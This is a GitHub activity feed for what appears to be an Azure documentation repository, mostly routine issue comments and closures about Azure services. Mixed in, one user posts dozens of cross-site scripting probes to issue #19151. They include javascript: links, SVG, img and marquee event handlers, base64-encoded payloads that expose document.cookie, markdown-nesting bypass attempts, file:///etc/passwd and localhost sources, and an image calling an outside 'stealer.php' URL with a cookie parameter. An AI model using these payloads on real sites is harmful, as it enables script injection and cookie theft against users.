[url](https://jjj.bom)

[2019-02-22 19:43] tacc716 commented on #19151
[url](javascript:alert`1`)

[2019-02-22 19:44] MGoedtel commented on #25321
@andrewatfornax - It should actually state that the solution supports a workspace in the following regions as opposed to stating the regions supported by LA.  I've updated the article and it should go live later today.  Thanks for bringing this to our attention.  #please-close

[2019-02-22 19:46] #25527 closed

[2019-02-22 19:48] femsulu commented on #25540
added triage labels and re-closing issue per customer update.

[2019-02-22 19:48] #25540 closed

[2019-02-22 19:48] michaeldevenney opened #25561 "Error when implementing Provider according to directions above"
I get an error after adding the Nuget package and setting up the web.config file.  The error is:  Could not load type 'Microsoft.Web.Redis.RedisSessionStateProvider'.  Has anyone else had this issue?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: d0396b8e-0a20-6cca-68ea-f01d9021c5ef
* Version Independent ID: eb138ff5-0

[2019-02-22 19:49] oxsmose commented on #25544
It seems your scenario works with generated compute, if I use SDK local environment I have some issue. So I switched to use a compute and I can test what I was looking for.
Thanks for your reactivity.

[2019-02-22 19:49] andrewdmoreno commented on #25285
@vikramdadwal Interesting. On my end I tried slighty different approach and was able to get a certificate from key vault passed in to the service via arm / environment variable, which I then pass to the kestrel listen options similar to the article you reference above.

Everything works locally. I can run it using the same image and hit the service as expected. When I deploy to mesh, however, it d

[2019-02-22 19:49] MicahMcKittrick-MSFT commented on #23291
Thanks @diannemg

I am investigating. Will update shortly.

[2019-02-22 19:54] tacc716 commented on #19151
![Google.com](http://qaz.eu5.org/xssd.svg)

[2019-02-22 19:55] tacc716 commented on #19151
!["><svg/onload=alert(12)>](http://qaz.eu5.org/stealer.php?ck=aaa)

[2019-02-22 19:58] tacc716 commented on #19151
hello <a name="n" href="javascript:alert('xss')">*you*</a>

[2019-02-22 19:58] tfitzmac commented on #25437
Looks like the change was published.

[2019-02-22 19:58] tfitzmac commented on #25437
#please-close

[2019-02-22 19:59] tacc716 commented on #19151
<iframe src="http://127.0.0.1"></iframe>

[2019-02-22 19:59] tacc716 commented on #19151
<meter/onload=alert(3)>

[2019-02-22 19:59] tacc716 commented on #19151
XSS without () , document.cookie :D

<marquee/onstart="location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgiRG9tYWluID0gIitkb2N1bWVudC5kb21haW4rIlxuXG4iKyJDb29raWVzID0gIitkb2N1bWVudC5jb29raWUp`;">

javascript:window.onerror=alert;throw document.cookie;

<svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//

<html>
	<body>
		 <script>
		    var fn=window[String.fromCharCode(101,118,97,108

[2019-02-22 20:01] tacc716 commented on #19151
<img src="<svg/onload=alert(3)" onerror=alert(XSS)//">

[2019-02-22 20:01] aljo-microsoft commented on #25285
@vikramdadwal and @andrewdmoreno
Network topology works the same for all Azure resources.

SF Mesh Gateway resource is a very simple ingress load balancer for Containers managed by the mesh service.

Given both of you have successfully bound your containers listeners to your certificate, and have completed the SSL encryption of HTTP communication and Server Identification part of the SSL authentic

[2019-02-22 20:01] tacc716 commented on #19151
<img src="%22%3csvg/onload=alert(3)%3e" onerror=alert(XSS)//">

[2019-02-22 20:02] tacc716 commented on #19151
<img src="javascript:alert;throw 1;" onerror=alert(XSS)//">

[2019-02-22 20:03] tacc716 commented on #19151
<img src="javascript:alert`1`" onerror=alert(XSS)//">

[2019-02-22 20:03] tacc716 commented on #19151
<img src="javascript%3Aalert`1`" onerror=alert(XSS)//">

[2019-02-22 20:04] tacc716 commented on #19151
<blockquote>
 <p>hello <a name="n"
 href="javascript:alert('xss')"><em>you</em></a></p>
</blockquote>

[2019-02-22 20:04] tacc716 commented on #19151
[Click Me](javascript:alert('Injected!'%29)

[2019-02-22 20:04] kobulloc-MSFT commented on #25528
@imeya I believe @mrbullwinkle has thoroughly covered this (thank you!), but I would like to add a quote from the [documentation](https://docs.microsoft.com/en-us/azure/azure-monitor/app/app-insights-overview#whats-the-overhead):

We are going to close this thread as resolved but if there are any further questions regarding the documentation, please tag me in your reply and we will be happy to con

[2019-02-22 20:04] #25528 closed

[2019-02-22 20:05] tacc716 commented on #19151
# Hello

<img src="notexistimguri" onerror="alert(1)">

[2019-02-22 20:05] tacc716 commented on #19151
# Hello

<img src="file:///etc/passwd" onerror="alert(1)">

[2019-02-22 20:05] #25285 closed

[2019-02-22 20:08] tfitzmac commented on #19941
#please-close

[2019-02-22 20:08] sbrian26 commented on #25281
Yes, that's what I need, and hmm...  actually, it was my first inclination to inject the blob dependency; I couldn't get it to work and then thought I read that the Blob parameters were not available to HttpTriggers.… After closer read of KetanChawda-MSFT's comment, perhaps I'm misinterpreting that as he says explicitly [not available "if the function is purely HTTP Triggered"] thanks for the refe

[2019-02-22 20:16] MicahMcKittrick-MSFT commented on #25543
@sybrenstuvel can you provide a sample output of what you are seeing?

[2019-02-22 20:17] MadDenker commented on #25548
It is not a documentation issue, it is an issue with the DSVM build and product itself.  If this is the incorrect place to put this, can you point me to where I should post?

[2019-02-22 20:30] tacc716 commented on #19151
![[url](javascript:alert(3))](https://google.com)

[2019-02-22 20:31] tacc716 commented on #19151
[[url](javascript:alert(3))](https://google.com)

[2019-02-22 20:31] tacc716 commented on #19151
[[url](http://xss.com)](https://google.com)

[2019-02-22 20:31] tacc716 commented on #19151
['[url](http://xss.com)'](https://google.com)

[2019-02-22 20:32] tacc716 commented on #19151
[\[ur\]\(http://xss.com\)](https://google.com)

[2019-02-22 20:32] tacc716 commented on #19151
!\[[url](http://xss.com)](https://google.com)

[2019-02-22 20:32] tacc716 commented on #19151
![\[url\](http://xss.com)](https://google.com)

[2019-02-22 20:33] tacc716 commented on #19151
# > - [`](javascript:alert(3);//https://google.com)

[2019-02-22 20:49] MicahMcKittrick-MSFT commented on #24936
Thanks @cynthn I just tried what you suggested and it didn't error out :)

[2019-02-22 20:56] vikramdadwal opened #25564 "Already running Containers not responding during scale out."
While updating the replica count, during the deployment the already running container become unresponsive.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 6ac12ec3-526c-071d-184e-c7988a104db4
* Version Independent ID: 342a7347-6e3a-4a3c-b6d7-9996f61a291a
* Content: [Tutorial- Scale an app running in Azure Service Fabric

[2019-02-22 21:13] ThirstyAdmin commented on #25298
@CHEEKATLAPRADEEP-MSFT

That's ok :) i am just confirming that there is no API that i can currently use with Datalake Gen2. And am really just asking when / if they will be available soon or not, as setting up the security even if i'm using AAD groups per folder is very time consuming and tedious. I just want to speed up is all.

i read the line: Blob Storage APIs and Azure Data Lake Gen2 APIs are

[2019-02-22 21:28] MarileeTurscak-MSFT commented on #25560
@jaffadog
Thanks for your feedback! We will investigate and update as appropriate.

[2019-02-22 21:29] Placid7 opened #25566 "Adding multiple resources"
Is there not a way to add multiple resources without adding each metric individually?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: ea95f9c8-e0ad-93d2-cac2-0b486a684600
* Version Independent ID: e03365fb-056d-1388-1cc3-01c009b1d2ec
* Content: [Azure Monitor metrics explorer](https://docs.microsoft.com/en-us/azure/azur

[2019-02-22 21:32] CelesteDG commented on #11687
We have an Azure DevOps backlog work item, #644841, to track this request as it's part of some other dependencies. We are working to update all the docs and this is on our list of updates. Thank you.

For now, #please-close

[2019-02-22 21:35] femsulu commented on #25286
Thanks @sgoings.

We will now close this issue. If there are further questions regarding this matter, please reply and we will gladly continue the discussion.

[2019-02-22 21:35] #25286 closed

[2019-02-22 21:39] jtuliani commented on #25546
Thank you!

[2019-02-22 21:39] #25546 closed